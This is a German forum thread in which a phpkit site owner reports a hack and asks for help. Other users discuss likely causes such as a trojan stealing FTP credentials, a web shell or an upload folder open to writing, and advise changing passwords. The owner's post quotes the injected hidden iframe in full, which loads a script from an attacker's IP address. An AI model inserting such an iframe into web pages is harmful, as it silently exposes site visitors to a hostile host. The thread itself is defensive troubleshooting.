ist gerade angekommen
Einer sich eingehackt
Hi leute, habe gerade das problem gehabt das auf unserer website lauter fehlermeldungen auftauchten.
"Warning: Cannot modify header information - headers already sent by......"
Habe natürlich geguckt und gegoogelt und dann ist mir aufgefallen, dass die "default.php" die im "/pkinc/func" Ordner zu finden ist, heute mittag geändert wurde (über ftp festgestellt). Ich sofort nachgeschaut und siehe da, ein iframe am ende;
.....
?><iframe src="http://80.91.191.158/stats/priemIframe.php?part=2&hashftp=2d4ab687c7fc9023431446115a24228d&hashpage=5741d4458f4b6927ae662482517780c9" width=10 border=1 height=10 style="visibility:hidden"></iframe>
......
Jetzt meine frage, wie komm ich an weitere informationen was da genau passiert ist und wie kann ich es in der zukunft verhindern?
Wie ist es möglich das jemand die datei ändern kann?
Was sollte ich ambesten machen.....brauche eure hilfe
"Warning: Cannot modify header information - headers already sent by......"
Habe natürlich geguckt und gegoogelt und dann ist mir aufgefallen, dass die "default.php" die im "/pkinc/func" Ordner zu finden ist, heute mittag geändert wurde (über ftp festgestellt). Ich sofort nachgeschaut und siehe da, ein iframe am ende;
.....
?><iframe src="http://80.91.191.158/stats/priemIframe.php?part=2&hashftp=2d4ab687c7fc9023431446115a24228d&hashpage=5741d4458f4b6927ae662482517780c9" width=10 border=1 height=10 style="visibility:hidden"></iframe>
......
Jetzt meine frage, wie komm ich an weitere informationen was da genau passiert ist und wie kann ich es in der zukunft verhindern?
Wie ist es möglich das jemand die datei ändern kann?
Was sollte ich ambesten machen.....brauche eure hilfe
Entweder ist der Server nicht sicher, aber vermutlich sieht es wie eh und jeh nach einem trojaner auf deinem (oder jemand der zugriff per ftp bei dir hat) pc aus..
wenn php dateien bearbeitet wurden kann es aber auch eine shell sein die auf deinem space liegt..
dazu kann folgendes gemacht werden: Security Control - Ordner auf Grafiken mit Schadcode prüfen (1.6.03 - 1.6.5)
sollte es ein trojaner sein der auf einem client pc hockt (client = du oder jemand anderes) der zugriff per ftp hat und somit die ftp daten ausschnüffelt
EDIT: Dagegen kann pkSM nichts unternehmen!
Aktuelle Version [1.6.5]
wenn php dateien bearbeitet wurden kann es aber auch eine shell sein die auf deinem space liegt..
dazu kann folgendes gemacht werden: Security Control - Ordner auf Grafiken mit Schadcode prüfen (1.6.03 - 1.6.5)
sollte es ein trojaner sein der auf einem client pc hockt (client = du oder jemand anderes) der zugriff per ftp hat und somit die ftp daten ausschnüffelt
EDIT: Dagegen kann pkSM nichts unternehmen!
Aktuelle Version [1.6.5] |
Achtung: Dirk Kántor ist unterwegs! Er verteilt gerne Verwarnungen ohne vorher darüber diskutiert zu haben. |
ist gerade angekommen
also gescannt alles clean... was ich festgestellt hab; alle "index" dateien wurden geändert ABER NUR bei phpkit, habe 2 websiten laufen die unter phpkit laufen, 2 mit phpbb und eine mit joomla. komischerweise wurden nur die dateien (meist die "index dateien") von phpkit angegriffen. Kann es sein das eine neue lücke im phpkit ist?
das einzigst lückenhafte was da noch sein kann ist ein upload.. ordner mit chmod 777, avatar upload (siehe link im ersten post von mir)
oder der server is undicht.. aber das liegt wohl kaum in diesem ermessen, es sei denn es ist dein server
mit wieviel programmen, mit welchem, hast du dein rechner gescannt?
oder der server is undicht.. aber das liegt wohl kaum in diesem ermessen, es sei denn es ist dein server

mit wieviel programmen, mit welchem, hast du dein rechner gescannt?
|
Achtung: Dirk Kántor ist unterwegs! Er verteilt gerne Verwarnungen ohne vorher darüber diskutiert zu haben. |
ist gerade angekommen
habs jetzt herausgefunden. hatte noch ein zusetlichen ftp-acc für ein unteradmin erstellt den er ab und an genutzt hat und mit diesem wurden die dateien geändert.
Danke viel mals für deine info und vorallem für die schnellen antworten.
Aber eine frage hätte ich noch. Wenn ich mein backup einspiele, was sollte ich da aufjedenfall ändern? ich warte erstmal ein paar tage und warte bis hier mehr leute geantwortet haben damit ich nicht alles 2x und 3x ändern muss.
Danke viel mals für deine info und vorallem für die schnellen antworten.
Aber eine frage hätte ich noch. Wenn ich mein backup einspiele, was sollte ich da aufjedenfall ändern? ich warte erstmal ein paar tage und warte bis hier mehr leute geantwortet haben damit ich nicht alles 2x und 3x ändern muss.
ändern im sinne von?
Ändere:
FTP Passwort
DB Passwort
Homepage Passwort
Achte bei dem DB Passwort darauf, dass das PHPKIT ebenso nen neues Passwort für die DB braucht. und ggf. auch andere Addons.
Ändere:
FTP Passwort
DB Passwort
Homepage Passwort
Achte bei dem DB Passwort darauf, dass das PHPKIT ebenso nen neues Passwort für die DB braucht. und ggf. auch andere Addons.
|
Achtung: Dirk Kántor ist unterwegs! Er verteilt gerne Verwarnungen ohne vorher darüber diskutiert zu haben. |
ist gerade angekommen
alle die FileZilla als ftp programm benutzen und noch nicht gehackt worden sind ein großer tip von mir die passwörter zu ändern und das ding zu löschen. siehe hier: http://bit.ly/gBXa4O

- 1
- 2

Ähnliche Themen
-
alte Versionen [1.6.03|1.6.1|1.6.4] »-
Datei im Hauptverzeichnis eingehackt
(8. Mai 2009, 12:10)
-
alte Versionen [1.6.03|1.6.1|1.6.4] »-
Probleme mit KitnoSpam V2, Hack Block V2 und Foren Upload von ESA Lucky
(12. Januar 2008, 11:50)


